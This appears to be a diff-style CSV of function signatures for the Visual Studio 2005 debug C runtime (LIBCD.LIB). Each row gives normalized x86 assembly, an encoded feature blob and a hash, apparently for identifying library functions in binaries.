+__filwbuf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",KRdx1dRSDFcp2auwkvTRAeRSvJ91gwavKdmrsEvvARudWiLmIU703sSg0gkAAAAAnVoi5hLVPZgAAAAAMekEoDHpBKD8xKCq/MSgqsSg0gkAAAAAMekEoE++5JtZ9a9eS+8BG9ewl/eMK0ujKdmrsNRSDFcp2auwEtU9mNewl/eMK0ujWfWvXsSg0gkAAAAAxKDSCQAAAAAAAAAAKdmrsG0bkurUUgxXjCtLo9ewl/cAAAAA1FIMV8Sg0gkAAAAAt5wE4+RSvJ+S9NEBT77km568fiv+Ikd8nIZROORSvJ+S9NEB17CX9yFO9N4x6QSgMekEoCFO9N7ke5wD/iJHfCkXcdUAAAAA5HucAyFO9N5o50nZbRuS6tewl/cp2auwdYMGr5yGUThi2SnJ5FK8n5yGUThi2SnJnrx+KykXcdUAAAAAYtkpyfzEoKox6QSgaOdJ2SFO9N4AAAAA,[],6bc0ffbaa77887a677196c3b45c9c1734ecef435,VS2005,LIBCD.LIB
+__CIlog10,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,9a6bfc6ccf2cdc17e3b0d328a8c54c666c653509,VS2005,LIBCD.LIB
+_log10,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nJCC CONST",zSwRpkLuo1GQ4qERnxPcjwAAAAAAAAAAViAnmNFIlKUAAAAA6FWr2lYgJ5hC7qNRkOKhEZ8T3I+fE9yP+D5NV+hVq9rY4CgZ6FWr2jfULVPNLBGm0UiUpbOTIAyzkyAMN9QtU9FIlKUAAAAA0UiUpZ8T3I+fE9yPzSwRpjfULVPoVava2OAoGehVq9roVava6FWr2kLuo1HNLBGmAFkkeehVq9r4Pk1X6FWr2tFIlKVWICeY6FWr2uhVq9roVavas5MgDOhVq9oAAAAAQu6jUbOTIAyzkyAM,[],09996909c33bbf81fbf88b6c1618cf1fff9f295b,VS2005,LIBCD.LIB
+__mbsrchr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSHL R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nOR R32,R32\nCMP DWORD PTR SS:[EBP+CONST],R32\nJCC CONST",8yKPI4OuQ16xRhSdXqODJ4j8nk8AAAAAsUYUnZyGUTiu318Tg65DXoj8nk/4d/nBnIZROF6jgyf4d/nBK4njH0+LzAoAAAAAQUXQG0+LzAoAAAAAPsqG2V6jgycAAAAA+Hf5wYj8nk8AAAAAT4vMCgAAAAAAAAAAiPyeT/MijyNBRdAbXqODJ16jgycAAAAAcv8ZO/MijyMrieMfrt9fE16jgyc+yobZ+Hf5wV6jgycAAAAA,[],67d684bc9f773478e0e4721d331ba1899a910b2e,VS2005,LIBCD.LIB
+__getmbcp,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR DS:[0],0\nJCC CONST",AOHWawAAAAAAAAAAOWijNCbu4WVSw09AJu7hZQDh1msAAAAAUsNPQADh1msAAAAA,[],79deee6c9248564412147ab02870c4da353ca1f2,VS2005,LIBCD.LIB
+___initmbctable,"PUSH -3\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR DS:[0],CONST\nPOP EBP\nRETN",sWSyLQAAAAAAAAAAOWijNADh1muxZLItAOHWawAAAAAAAAAA,[],15e7c8791a8b86cf6c7b8e8011c6a8050ebfda7d,VS2005,LIBCD.LIB
+__setmbcp,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nCMP R32,CONST\nJCC CONST",nIZROC1MEB+8CgkcPsqG2eHZBXkAAAAAPsqG2WnNBgAAAAAAvAoJHNTZ7ssAAAAAfw9zfj7KhtkAAAAAFgly+F6jgyfKN4d44dkFeTUWchMP0VPtac0GAIJC5Ymqzw5e9CnuCIsNFEwAAAAAXqODJz7KhtkAAAAA9CnuCIsNFEwAAAAA/3/Ql0UWA21km95hLUwQH0+LzAoAAAAA1Nnuy0b54Stu0+zPqs8OXjUWchP0Ke4IRvnhK0+LzAoAAAAAPsqG2YsNFEwAAAAAJAPDnSSjmVz6K8VcnIZROEb54Stu0+zP4Ee7jhYJcvgAAAAAiw0UTB8Nqk/KN4d4btPsz9TZ7ssAAAAA+ivFXE+LzAoAAAAAPsqG2RYJcvgAAAAAyjeHeD7KhtkAAAAAZJveYeHZBXkAAAAAJKOZXE+LzAoAAAAAFgly+F6jgyfJLHBjPsqG2eHZBXkAAAAAT4vMCgAAAAAAAAAAZWZPcpyGUThmeTE1iw0UTPQp7gh/D3N+4dkFefQp7ggP0VPtySxwYz7KhtkAAAAAHw2qT/Qp7ggAAAAAPsqG2YsNFEwAAAAAfw9zfj7KhtkAAAAAQJLfgOHZBXkAAAAAD9FT7fQp7gjgR7uONRZyEz7KhtkAAAAA9CnuCJyGUTgAAAAAgkLliSQDw530Ke4I4Ee7jhYJcvgAAAAAPsqG2ZyGUTgAAAAAZnkxNU+LzAoAAAAAXqODJz7KhtkAAAAANRZyEz7KhtkAAAAAPsqG2RYJcvgAAAAARRYDbZyGUTgAAAAAnIZROPQp7giRnjRonIZRODq1tKVAkt+AOrW0pZyGUTgAAAAAkZ40aE+LzAoAAAAA9CnuCIsNFEwAAAAA9CnuCJyGUTgAAAAAPsqG2YsNFEwAAAAA1Nnuyy1MEB+8CgkcyjeHeD7KhtkAAAAA9CnuCGnNBgAAAAAAiw0UTP9/0Jd/D3N+D9FT7TUWchPgR7uO,[],5d7c2ba2ececcde7e0c46ff23c47a617ac7a95ec,VS2005,LIBCD.LIB
+__mbsnbicmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",0gU+hE+LzAoAAAAADjXzm16jgye4tfqZVaatKCQDw51meTE1uLX6mV6jgycAAAAAI9fgofMRN8sAAAAAXqODJztP3EkAAAAADjXzmw4185ss1qqsoxw+uOguicHoLonBZnkxNU+LzAoAAAAA9+dQLkGcaOT0Ke4I6C6JwV6jgycONfObJAPDnYhCHwx2ZN6YuLX6mV6jgycAAAAA68JDl/MRN8sAAAAAiH90QF6jgycAAAAA9CnuCIjmoBIAAAAAdmTemE+LzAoAAAAALNaqrF6jgycAAAAAUmd/BjUWchMNzMAB8xE3yztP3EkAAAAAQZxo5IjmoBIAAAAAU6KmeOFsJcEj1+ChLNaqrF6jgycAAAAAO0/cSVOipnichlE4DczAAU+LzAoAAAAADjXzm16jgyeO6YmoNRZyE4hCHwwAAAAAiEIfDCbu4WU7T9xJT4vMCgAAAAAAAAAA4dkFeUHvS2SIf3RAI9fgofMRN8sAAAAA6C6JweguicEs1qqsjumJqF6jgye4tfqZiH90QF6jgycAAAAAO0/cSe0XA8mchlE4Qe9LZA4185sONfOb4WwlwfMRN8sAAAAAXqODJ2ZrldwAAAAAJu7hZU+LzAoAAAAAnIZROLFGFJ2If3RA8xE3y2ZrldwAAAAAiH90QGZrldwAAAAAZmuV3FJnfwbSBT6E7RcDyevCQ5cj1+ChsUYUnaMcPriIf3RAiOagEmZrldwAAAAAnIZROOHZBXn351Au,[],2c90eb6817d12abfb91f2990f99b7c78462fbe10,VS2005,LIBCD.LIB
+_puts,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32",nIZROORSvJ+S9NEBdYMGr5yGUTgLvxJo5FK8n5yGUTgLvxJokvTRAeRSvJ91gwavC78SaF0W4SpmBnt/ZgZ7f7CPEWIfzVUY7xfqreRSvJ+S9NEBXRbhKgAAAAAAAAAAH81VGMSMgqcAAAAAxIyCpwAAAAAAAAAAsI8RYsSMgqcAAAAA,[],69d403c983b17d221ce08a238158f8f75f5de0bc,VS2005,LIBCD.LIB
+_mainCRTStartup,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCALL CONST\nCALL DWORD PTR DS:[0]\nMOV DWORD PTR DS:[0],R32\nCALL CONST",3B+M8yt61uHBfTAZwX0wGQAAAAAAAAAAK3rW4QAAAAAAAAAA,[],4f4d25ff7420a8bedef0747da6c47b0ad5be350b,VS2005,LIBCD.LIB
+___lc_strtolc,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",nIZROJyGUTh7qn/he6p/4ZyGUTgr7Vf/Ju7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAK+1X/3uqf+EAAAAA9CnuCMJw9QoAAAAAPsqG2cJw9QoAAAAAwnD1CnFNI2avJ1dcnIZROMSSpmiy9BmIsvQZiOCROzl7qn/h8sY+HW1JBQZmeTE1e6p/4ZyGUTgd0S+se6p/4cSSpmjgkTs5rydXXE+LzAoAAAAA4JE7OXuqf+EAAAAAcU0jZpyGUTichlE4ZnkxNU+LzAoAAAAAnIZROJyGUTh7qn/hbUkFBvQp7gjdLNxtxJKmaE+LzAoAAAAAe6p/4bL0GYheo4MnHdEvrHuqf+EAAAAA3SzcbfQp7giYwYLNXqODJybu4WUAAAAAsvQZiCMp6VVeo4MnmMGCzU+LzAoAAAAAXqODJybu4WUAAAAAIynpVT7KhtkAAAAAnIZROJyGUTichlE4,[],e1c6be7f29501491bdff03d9255c67a224f38059,VS2005,LIBCD.LIB
+__strcats,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nJMP SHORT CONST",lIUXNQmX7pwAAAAAHTaCjwAAAAAAAAAACZfunB02go+UhRc1g65DXh02go+UhRc1/xa054OuQ14AAAAA,[],d770c1942c92b0e666b51edac605776628136974,VS2005,LIBCD.LIB
+__expandlocale,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",nIZROJyGUTjm7Jq/ZnkxNU+LzAoAAAAA5uyav5yGUTgAAAAAxJUNSpyGUTgAAAAAoYAzotAL0NRmeTE1nIZROMjpS2Lm7Jq/5uyav8jpS2IAAAAAnIZROMuCy5W5lracZnkxNU+LzAoAAAAA0AvQ1Io4eIJ6/wYMy4LLlU+LzAoAAAAAyOlLYk+LzAoAAAAAT4vMCgAAAAAAAAAAl1TceZyGUTiXVNx5Mbv6YW1JBQZmeTE1l1TceZyGUTiYr8OUZnkxNU+LzAoAAAAAev8GDJyGUTgAAAAAbUkFBpdU3HndLNxt3SzcbZdU3Hlh3PvcmK/DlKGAM6JmeTE1ijh4gpyGUTgAAAAAuZa2nMuCy5UAAAAAYdz73JyGUTjElQ1K,[],23467efed48a66e12708c32ba9023ab076d6c4c6,VS2005,LIBCD.LIB
+_setlocale,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",wgAvieE5VZE+mZJoZnkxNU+LzAoAAAAAXqODJ9TZ7ssAAAAAMbv6YWZ5MTWchlE4nIZROJyGUTjUA6Qh9CnuCJyGUTgAAAAAKAtrUNUc1LYAAAAA1AOkIV6jgycAAAAA1Nnuy7BfNVM9Q8cq9CnuCJyGUTgAAAAAnIZROJyGUThmeTE1ZnkxNU+LzAoAAAAA1Nnuy5yGUTichlE44TntPLKUQ5hEiKumnIZROLBfNVM9Q8cqPpmSaFi2meKchlE4PUPHKl6jgycvP2AHnIZROKq4DCqchlE4nIZROJyGUTichlE4nIZROMOYvKAiZsVmZnkxNU+LzAoAAAAAnIZROF6jgydfw2OXRIirpmZ5MTVk7ghyImbFZigLa1AAAAAA4TlVkVi2meKchlE4nIZROMIAL4ntd/m/X8NjlwAAAABOm5O/nIZROAAAAACtBNRwWLaZ4mZ5MTVk7ghyrQTUcAAAAAAAAAAAnIZROHXeygmtBNRwrQTUcCgLa1AAAAAAXqODJ7BfNVMAAAAALz9gB16jgydeo4Mn4TntPLKUQ5jhOe08TpuTv/Qp7gjIUl/Xdd7KCV6jgycAAAAA7Xf5v8IAL4m1L03tXqODJ9Uc1LYAAAAAZO4IcmZ5MTXdLGTAQ8YxcAAAAAAAAAAAKAtrUF6jgycAAAAA1RzUtgAAAAAAAAAAT4vMCgAAAAAAAAAAqrgMKkPGMXCYAlI+XqODJ9TZ7ssAAAAAyFJf116jgycAAAAAsF81U5yGUTjdLGTAspRDmF6jgyf0Ke4I3SxkwJyGUThmeTE19CnuCF6jgycAAAAA3SxkwPQp7ghmeTE1tS9N7eE5VZE+mZJoXqODJ16jgycAAAAAw5i8oNUc1LYAAAAAmAJSPrKUQ5jhOe08,[],567a4644cb2bcaa0b97e2c2f22a95245a21bfe15,VS2005,LIBCD.LIB
+___lc_lctostr,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",N8CF6AAAAAAAAAAA65YiREpJE64UMZPxAOHWawAAAAAAAAAASkkTrgDh1ms3wIXoFDGT8QDh1ms3wIXo,[],75bc45aba6d393f52f4fb564001817b8bfed4508,VS2005,LIBCD.LIB
+___init_dummy,"PUSH EBP\nMOV EBP,ESP\nXOR R32,R32\nPOP EBP\nRETN",F0UAEQAAAAAAAAAA,[],a737d8b8f0a0c3ab192f3887d4e523ede59957cb,VS2005,LIBCD.LIB
+__fstati64,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP R32,DWORD PTR DS:[0]\nJCC CONST",nIZROByOHW0uo/JZXxNbMkFF0BsAAAAAn5wfPEFF0BsAAAAAHI4dbUFF0BsAAAAANRZyE0FF0BsAAAAAn5wfPEFF0BsAAAAA2MX2RCaeBgSfnB88MBP0NtjF9kSchlE4LqPyWUFF0BsAAAAAHI4dbUFF0BsAAAAAJp4GBJyGUTgAAAAAn5wfPEFF0BsAAAAAnIZROJyGUThpzQYATR0x0jUWchMAAAAAac0GAJyGUTichlE4sO4TDx4YujkGYojDJp4GBF8TWzIAAAAAnIZROHpc3p2/dwbPDpXpTH6MqIAA19cHH2deBmBEHsuQWYeAANfXB9jF9kQAAAAAelzenXcyIRUAAAAABmKIw1iFkXceGLo5eghuPw6V6Uwcjh1tQUXQGy+iRdUAAAAAdzIhFR9nXgZNHTHSL6JF1QAAAAAAAAAAfoyogJ+cHzzYxfZEv3cGz3cyIRUAAAAAnIZROIBKZVnYxfZEYEQeyzUWchMAAAAA2MX2RJ+cHzzYxfZEHhi6OS+iRdUAAAAAgEplWZyGUTgAAAAA2MX2RJ+cHzzYxfZEkFmHgDUWchMAAAAAnIZRONjF9kSchlE4WIWRd3oIbj+chlE4nIZROIBKZVnYxfZEgEplWV8TWzIAAAAA2MX2RCaeBgSfnB882MX2RDAT9DafnB882MX2RJ+cHzzYxfZE,[],cca0f11168f827948dbb514e8b240fc929e4cc32,VS2005,LIBCD.LIB
+__wstati64,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R16,WORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nAND R32,CONST\nSUB R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",FxA1hc5VVj8AAAAAiFkaq8nm2P/opF1o2psftoD00Efamx+276Z+QPL0CDMm+BgpgPTQRy+iRdUAAAAASRrSFT+o/SwAAAAALexRRtqbH7Z+RkN0vggwVj+o/SwAAAAAJvgYKeikXWjy9AgzGctX2dqbH7YpwMtp2psftsO+4B6A9NBH6KRdaC+iRdUAAAAAP6j9LC+iRdUAAAAAL6JF1QAAAAAAAAAAzlVWP9qbH7YpwMtpw77gHr4IMFYAAAAA8vQIM8i+xGHopF1ow77gHosNFEwAAAAAgPTQRy+iRdUAAAAAGGtoP9qbH7Z+RkN0yebY/xnLV9khIEEl2psftoD00Efamx+26KRdaC+iRdUAAAAAiw0UTNqbH7Z+RkN0ISBBJRcQNYUAuL6WKcDLaeikXWjtbek8fkZDdEka0hXamx+2ALi+lhcQNYXopF1o2psfti3sUUaA9NBH2psftoD00Efamx+2yL7EYT+o/SwAAAAA7W3pPOikXWjvpn5A6KRdaC+iRdUAAAAAgPTQRy+iRdUAAAAA2psftsO+4B6A9NBHfkZDdBhraD/amx+2,[],5c6a4c8764dd4598e5edd3b5a71c49c35e06768d,VS2005,LIBCD.LIB
+___wrt2err,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST",jmepHQAAAAAAAAAA,[],68fcbf6a3af5747fc2094942b3316e18379c9103,VS2005,LIBCD.LIB
+__strerror,"MOV R32,DWORD PTR DS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32*4]\nPUSH R32\nPUSH CONST\nCALL CONST\nADD ESP,CONST",pBdjbyQDw533n/2iFGUr6HNHHg4AAAAA95/9ohOFrXPpTsVeJAPDnROFrXPpTsVeE4WtcwAAAAAAAAAAt++NVyQDw52kF2Nv6U7FXhOFrXMUZSvoc0ceDgAAAAAAAAAA,[],0c6e185fc1871fc9f845c9adc24c965a1d1f15f4,VS2005,LIBCD.LIB
+__CItanh,"PUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nADD ESP,CONST\nADD BYTE PTR DS:[R32],R8\nADD BYTE PTR DS:[R32+R32*8+CONST],R8\nJMP FAR R32",l3FRnnuGdtEAAAAAmuufxwAAAAAAAAAACTKeHgAAAAAAAAAAe4Z20Zrrn8cJMp4e,[],a0ca3ab1cf583402a3c0ee2c8eef1b1b065ea04d,VS2005,LIBCD.LIB
+_cosh,"MOV R32,0\nJMP SHORT CONST",l3FRnjplNTwAAAAAOmU1PAAAAAAAAAAA,[],df3a59894ca35ddacc0c500290dee53b4a0ef714,VS2005,LIBCD.LIB
+_tanh,"MOV R32,0\nJMP SHORT CONST",KrNC3l6jgycAAAAAl3FRnl6jgycAAAAANRZyEyqzQt4AAAAAXqODJzUWchMAAAAA,[],544a8f25efd3867a78f6fcd75c21872d7b79e407,VS2005,LIBCD.LIB
+__CIsinh,"MOV R32,0\nJMP CONST",NRZyE5dxUZ4AAAAA/MSgqpdxUZ4AAAAAl3FRnjUWchMAAAAA,[],417ca40e03f635941442ee61b3ca4354b8f45f30,VS2005,LIBCD.LIB
+__CIcosh,"MOV R32,0\nJMP SHORT CONST",NRZyE5dxUZ4AAAAAXqODJzUWchMAAAAAl3FRnjUWchMAAAAAl3FRnl6jgycAAAAA,[],a05a81e88097aa93e17e1b514178e15b32cf5221,VS2005,LIBCD.LIB
+_sinh,"MOV R32,0\nJMP SHORT CONST",KrNC3jUWchMAAAAAl3FRnjUWchMAAAAANRZyE5dxUZ4AAAAA,[],5a35166aa9725b1a7334b8c52359d601388bb79b,VS2005,LIBCD.LIB
+___timet_from_ft,"LEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",tXvK0U+LzAoAAAAAKdmrsL5X1NjEkqZoA76Dx75X1Ngp2auwT4vMCgAAAAAAAAAA2MX2RLV7ytHEkqZoxJKmaE+LzAoAAAAAvlfU2MSSpmjYxfZExJKmaE+LzAoAAAAA,[],eebc6cf03a8e9dc5e6d14e45084bb4d8f8bae80e,VS2005,LIBCD.LIB
+__findfirst,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",MhSYrYPygRlx/sHorydXXE+LzAoAAAAAcf7B6AAAAAAAAAAA6F+nPU+LzAoAAAAAT4vMCgAAAAAAAAAAg/KBGa8nV1wAAAAAxiy7L+hfpz0yFJit,[],19a53edb4404a1e0d8e36cce379d309f5bc40c47,VS2005,LIBCD.LIB
+__findclose,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]\nTEST R32,R32\nJCC CONST",AOHWawAAAAAAAAAA3ojTWSbu4WV1rUsNda1LDQDh1msAAAAAJu7hZQDh1msAAAAA,[],f7ab1a35df3963e9e353c2e8ced759c36d753c3d,VS2005,LIBCD.LIB
+__findnext,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,CONST\nNEG R32\nSBB R32,R32\nAND R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR DS:[R32],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",g/KBGcSSpmgAAAAAMhSYrYPygRlx/sHoxJKmaE+LzAoAAAAA+UdSa4mzSUIyFJitT4vMCgAAAAAAAAAAibNJQk+LzAoAAAAAcf7B6AAAAAAAAAAA,[],0c8c0be6835550a33956d0b8068b3485749ed22d,VS2005,LIBCD.LIB
+_wcsspn,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nCMP R32,R32\nJCC CONST",PsqG2eluZm0AAAAAISBBJYTH21hxWpQ6MVcF0SEgQSUAAAAAXqODJz7KhtkAAAAAyFJf1yEgQSUAAAAAcVqUOuluZm0AAAAAISBBJV6jgyc+qYZfhMfbWE+LzAoAAAAAPqmGX0+LzAoAAAAAT4vMCgAAAAAAAAAA6W5mbchSX9chIEEl,[],e40e77d070fcff26b5f29200721e1dbb3fe9670d,VS2005,LIBCD.LIB
+__strncoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST",XqODJ222pwYAAAAAmC8l00+LzAoAAAAAbbanBk+LzAoAAAAAJgwaipgvJdNeo4MnJAPDnSYMGood0S+sDczAAU+LzAoAAAAAHdEvrE+LzAoAAAAAT4vMCgAAAAAAAAAAjLRRTiQDw50NzMAB,[],1025a12321d5073994479137b32cd198eaacf9ed,VS2005,LIBCD.LIB
+__getw,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]",p7RcJJfgkLE3oTO2N6Eztulehb0AAAAAMekEoJZz8F8x6QSglnPwX5k9lOYAAAAAnIZROORSvJ+S9NEB6V6FvX0JSDQAAAAAmT2U5gAAAAAAAAAA5FK8n5yGUTj4d/nBkvTRAeRSvJ87j6vlMekEoJZz8F9xWpQ6l+CQselehb0AAAAA+Hf5wX0JSDQAAAAAO4+r5eRSvJ8AAAAAfQlINDHpBKCntFwkcVqUOpk9lOYAAAAAPe4HX5yGUTgAAAAA,[],b279e334c00fe4784ca6112af6db62de664b1c3b,VS2005,LIBCD.LIB
+_ferror,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nPOP EBP\nRETN",Jo7rewAAAAAAAAAA,[],e3df22348971d6531fb1fc0052526bc2cc542525,VS2005,LIBCD.LIB
+_feof,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nPOP EBP\nRETN",Jo7rewAAAAAAAAAA,[],57c0a0903490e2164b4900843cf3a890c0702456,VS2005,LIBCD.LIB
+_wcschr,"MOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R16,WORD PTR DS:[R32]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nCMP R32,R32\nJCC CONST",frgK5Sbu4WWgNzqhyFJf1yEgQSUAAAAAfrgK5X64CuXIUl/XRYriTiEgQSUAAAAAISBBJX64CuV+uArloDc6oQDh1msAAAAAJu7hZQDh1msAAAAAAOHWawAAAAAAAAAA,[],e2571c28651e1685ad0c2d85cb0ba1501b57a422,VS2005,LIBCD.LIB
+__wgetenv,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nCMP R32,DWORD PTR SS:[EBP+CONST]\nJCC CONST",3XDeWybu4WWchlE4nIZROJyGUTgkA8OdpQsjJJyGUThmeTE1g65DXibu4WWCxTmVJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROCbu4WWchlE4JAPDnZyGUThSaOpbgsU5lchSX9cOF3UinIZROCbu4WWX4JCxUmjqW91w3ltmeTE1Jm0Xn8hSX9dHCE8+l+CQsYOuQ14AAAAARwhPPk+LzAoAAAAAZnkxNU+LzAoAAAAAyFJf14OuQ14AAAAAZnkxNU+LzAoAAAAADhd1IshSX9cmbRef,[],638f74100d04a90340451815a5e42f4c114463af,VS2005,LIBCD.LIB
+?__ArrayUnwind@@YGXPAXIHP6EX0@Z@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nJMP SHORT CONST",vw9iyAAAAAAAAAAA9CnuCL8PYsgAAAAAJrY+udTZ7ssAAAAA1Nnuy/Qp7ggmtj65WZ12fNTZ7ssAAAAA,[],6fd8bbd58960e0ff38de7f58d9107bb03428012a,VS2005,LIBCD.LIB
+??_M@YGXPAXIHP6EX0@Z@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSUB R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCALL DWORD PTR SS:[EBP+CONST]\nJMP SHORT CONST",9KEneb8PYsgAAAAAJrY+udTZ7ssAAAAA1Nnuy/ShJ3kmtj65A2gRLtTZ7ssAAAAAvw9iyAAAAAAAAAAA,[],4e8932c50dcf4136d64908f02a0a23f61401a067,VS2005,LIBCD.LIB
+__EH_prolog,"PUSH -1\nPUSH R32\nMOV R32,DWORD PTR FS:[0]\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR FS:[0],ESP\nMOV DWORD PTR SS:[ESP+CONST],EBP\nLEA EBP,DWORD PTR SS:[ESP+CONST]",nP/37gAAAAAAAAAA,[],08a5bfe4656c57358b211d71178753df37b4e9d4,VS2005,LIBCD.LIB
+__mbsnicmp,"MOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nXOR R32,R32\nCMP R32,R32\nSETLE R8\nDEC R32",iEIfDCbu4WU7T9xJ2wdx7zUWchMNzMABXqODJ7k2qHwAAAAADjXzmw4185ss1qqs7RcDyZ1t798j1+ChO0/cSe0XA8nh2QV5DczAAU+LzAoAAAAANRZyE4hCHwwAAAAAZnkxNU+LzAoAAAAAJu7hZU+LzAoAAAAAGY8rq+0XA8nh2QV5T4vMCgAAAAAAAAAALNaqrF6jgycAAAAAQe9LZA4185sONfObI9fgodQjZA4AAAAAIheRGO0XA8nh2QV5DjXzmw4185ss1qqsO0/cSe0XA8nh2QV5DjXzm16jgyeO6YmonW3v39sHce/Intqf4dkFeUHvS2SIf3RALNaqrF6jgycAAAAAVaatKCQDw51meTE11CNkDtsHce/IntqfiH90QF6jgycAAAAAuTaofNsHce/IntqfDjXzm16jgyeO6YmoI9fgoSIXkRgAAAAAjumJqF6jgycAAAAAJAPDnYhCHwx2ZN6Y4dkFeUHvS2SIf3RAdmTemE+LzAoAAAAAyJ7an0+LzAoAAAAAjumJqF6jgycAAAAAiH90QF6jgycAAAAAXqODJztP3EkAAAAA7RcDyRmPK6sj1+ChQe9LZA4185sONfOb,[],e2a17fc8e5b75bef47399df027f1cc3ef609d54b,VS2005,LIBCD.LIB
